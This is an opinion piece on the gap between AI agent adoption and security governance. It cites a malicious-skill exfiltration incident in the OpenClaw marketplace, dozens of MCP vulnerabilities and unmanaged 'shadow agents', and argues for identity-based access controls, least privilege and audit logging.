Every week brings new breakthroughs in AI agents. Every week also brings evidence that the infrastructure underneath them was not built for what is being asked of it.
The numbers are not subtle. According to Okta research cited by Auth0 president Shiv Ramji in a Computer Weekly column published Monday, 91% of organisations are now adopting AI agents. Ten percent have governance strategies in place. That gap — between deployment velocity and the security infrastructure to contain what you've deployed — is the actual story in enterprise AI security right now.
The concrete version of that gap showed up in February 2026, when critical vulnerabilities were discovered across the OpenClaw skill marketplace. More than 5,700 community-built skills were available in the marketplace at the time. Over 21,000 exposed instances were identified. Malicious actors had uploaded skills that performed legitimate automation tasks while secretly exfiltrating sensitive data from users' machines. The agent that was supposed to help you was helping itself to your files.
OpenClaw is not a fringe project. It is the fastest-growing open-source project in GitHub history, with over 188,000 stars. When a marketplace that size — with that many contributors, that many installed instances, and that broad a reach into developer workflows — becomes the entry point for a data exfiltration campaign, it is not an anomaly. It is a preview.
The Model Context Protocol, the Anthropic-developed standard for connecting AI models to external tools and services, tells the same story from a different angle. Adversa AI documented 30 CVEs filed against MCP implementations in a 60-day window earlier this year. A February 2026 audit found that 43% of publicly available MCP servers were vulnerable to command execution attacks — inadequate input validation, missing authentication, overly permissive tool definitions. Researchers demonstrated tool poisoning attacks against the WhatsApp MCP Server. Anthropic's own Git MCP server had confirmed remote code execution vulnerabilities.
Thirty CVEs in 60 days. That is not a development problem. That is a deployment velocity problem. The protocol shipped with security as an afterthought, and the field is now racing to catch up.
Ramji frames it correctly as an architectural shift, not a feature gap. Traditional applications operate within predictable boundaries — users navigate defined screens, execute defined transactions, move through guarded corridors inside application logic. AI agents are conversational, accept natural language input from anywhere, and make autonomous decisions that cannot be entirely predicted. The access point is no longer buried in application code. It is at the front end, in the conversation itself. When you compromise a deterministic application, damage is contained. When you compromise an AI agent, you are looking at potential access across your entire infrastructure, with actions that ripple in unpredictable directions.
The four requirements Ramji lays out — genuine agent and user authentication linking each agent action back to its authorising human; standardised secure API access hardened against token leakage; human validation in the loop for high-risk actions; and fine-grained least-privilege permissions with full audit logging — are not radical ideas. They are the access management playbook that organisations have spent two decades learning for human users, applied to non-human identities. The problem is that most organisations have not started that translation yet.
The MCP ecosystem is trying to embed security earlier in the design cycle than cloud and APIs did. But effort is not outcome. The CVE count and the OpenClaw incident suggest the outcome so far is a protocol and a marketplace that grew faster than their security surface was hardened.
Shadow agents make this worse. These are the autonomous workflows employees build outside IT purview — connecting ChatGPT to company email via Zapier, running OpenClaw on a personal laptop with access to Slack channels and Jira, pulling production data through n8n for processing by Claude. None of these are malicious by intent. All of them create unmanaged, unmonitored agents with access to sensitive company data, operating with the full permissions of the creating user and often more, since many platforms request broad OAuth scopes.
The gap between 91% adoption and 10% governance is not abstract. It is 21,000 exposed OpenClaw instances. It is 30 MCP CVEs in 60 days. It is a shadow agent ecosystem that most IT teams cannot see, let alone secure. The foundational principles — identity governance, least-privilege access, encryption, comprehensive auditing — still work. They are more important than ever. The question is whether organisations approach this thoughtfully or spend the next several years managing preventable incidents. The evidence so far suggests the clock is not on their side.